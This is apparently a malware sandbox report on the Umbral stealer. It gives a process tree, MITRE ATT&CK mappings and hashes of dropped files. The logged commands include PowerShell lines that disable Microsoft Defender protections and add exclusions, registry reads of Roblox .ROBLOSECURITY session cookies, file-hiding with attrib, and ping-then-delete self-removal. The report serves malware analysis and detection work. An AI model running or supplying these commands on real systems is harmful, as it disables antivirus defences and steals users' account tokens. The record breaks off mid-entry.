        24⤵
        Executes dropped EXE
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:3532
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Views/modifies file attributes
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        
        PID:1864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:4392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:3792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:2624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:4468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        
        PID:4824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:1872
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        24⤵
        
        PID:748
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        Runs ping.exe
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Executes dropped EXE
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:3376
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:2980
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Views/modifies file attributes
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:4020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:1520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:3436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        
        PID:3248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:1292
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        21⤵
        
        PID:2196
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        Runs ping.exe
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Executes dropped EXE
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:1572
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Views/modifies file attributes
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:3376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:4392
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:4232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        
        PID:4412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:3308
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        18⤵
        
        PID:2268
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        Runs ping.exe
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1572
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Views/modifies file attributes
        
        PID:1768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:2964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:1016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:3144
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        15⤵
        
        PID:1416
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:4176
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Views/modifies file attributes
        
        PID:2264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:1388
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4424
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:3636
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        12⤵
        
        PID:4492
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        Runs ping.exe
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:1000
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Views/modifies file attributes
        
        PID:3868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:4784
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:2144
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        9⤵
        
        PID:756
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        Runs ping.exe
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:876
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Executes dropped EXE
        
        PID:3692
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4084
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:1000
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2980
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:436
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:540
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:4300
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:3112
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:4944
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:388
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4344
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        6⤵
        
        PID:3856
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:4016
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:3628
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:4560
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:2096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4948
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5068
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2904
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3312
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:4348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SolaroB.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
277f918918ca1de032c2948911ecb93c

SHA1
0307e48f22426ecfccad2f8eb0e69937ab957620

SHA256
f1a2de3d06fea09450f785b6746c54aaa5576fd844a42f95bd6776cf6105109f

SHA512
043d2ec78967055dd38d423277964681d9e0720eeb9cbf258c7ec753146d261a613a1e3b7adb9ab277f4657a21230e1c00d8fa96fcdf337c4a63cc1226fd52fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
